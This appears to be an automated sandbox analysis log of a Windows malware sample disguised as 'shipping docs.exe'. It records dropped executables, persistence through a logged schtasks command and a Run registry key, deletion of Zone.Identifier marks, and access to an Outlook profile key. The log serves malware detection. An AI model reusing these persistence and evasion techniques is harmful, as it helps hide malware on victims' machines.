Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5220:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4536:120:WilError_01

Source: 3.0.shipping docs.exe.400000.0.unpack, A/f2.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 3.0.shipping docs.exe.400000.0.unpack, A/f2.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'

Source: C:\Users\user\Desktop\shipping docs.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\shipping docs.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\shipping docs.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: C:\Users\user\Desktop\shipping docs.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: shipping docs.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: shipping docs.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\shipping docs.exe	Code function: 3_2_02DF0007 push ecx; retf
Source: C:\Users\user\Desktop\shipping docs.exe	Code function: 3_2_02DF0430 push ecx; retf
Source: C:\Users\user\Desktop\shipping docs.exe	Code function: 3_2_061F3692 push es; iretd
Source: C:\Users\user\Desktop\shipping docs.exe	Code function: 3_2_061F3701 push es; iretd
Source: C:\Users\user\Desktop\shipping docs.exe	Code function: 3_2_061FE767 push es; ret
Source: C:\Users\user\Desktop\shipping docs.exe	Code function: 3_2_061F3448 push es; iretd
Source: C:\Users\user\Desktop\shipping docs.exe	Code function: 3_2_061F34CF push es; iretd
Source: C:\Users\user\Desktop\shipping docs.exe	Code function: 3_2_061F7CF0 push es; ret
Source: C:\Users\user\Desktop\shipping docs.exe	Code function: 3_2_061F353F push es; iretd
Source: C:\Users\user\Desktop\shipping docs.exe	Code function: 3_2_061F35AD push es; iretd
Source: C:\Users\user\Desktop\shipping docs.exe	Code function: 3_2_061F1910 push es; ret
Source: C:\Users\user\Desktop\shipping docs.exe	Code function: 3_2_066FA8B8 push cs; retn 066Fh
Source: C:\Users\user\Desktop\shipping docs.exe	Code function: 3_2_066F9FF8 pushfd ; retf 065Fh
Source: C:\Users\user\Desktop\shipping docs.exe	Code function: 3_2_066FC8DE push es; retf
Source: C:\Users\user\Desktop\shipping docs.exe	Code function: 3_2_06849AE1 push es; ret
Source: C:\Users\user\Desktop\shipping docs.exe	Code function: 3_2_06844387 push edi; retn 0000h

Source: initial sample	Static PE information: section name: .text entropy: 7.898839095668671
Source: initial sample	Static PE information: section name: .text entropy: 7.898839095668671
Source: initial sample	Static PE information: section name: .text entropy: 7.898839095668671

Source: C:\Users\user\Desktop\shipping docs.exe	File created: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe			Jump to dropped file
Source: C:\Users\user\Desktop\shipping docs.exe	File created: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe			Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\shipping docs.exe

Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yVGAJfiVEvtg" /XML "C:\Users\user\AppData\Local\Temp\tmp7934.tmp

Source: C:\Users\user\Desktop\shipping docs.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run VMqTMMD			Jump to behavior
Source: C:\Users\user\Desktop\shipping docs.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run VMqTMMD			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Users\user\Desktop\shipping docs.exe	File opened: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe:Zone.Identifier read attributes \| delete
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	File opened: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe:Zone.Identifier read attributes \| delete

Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\shipping docs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
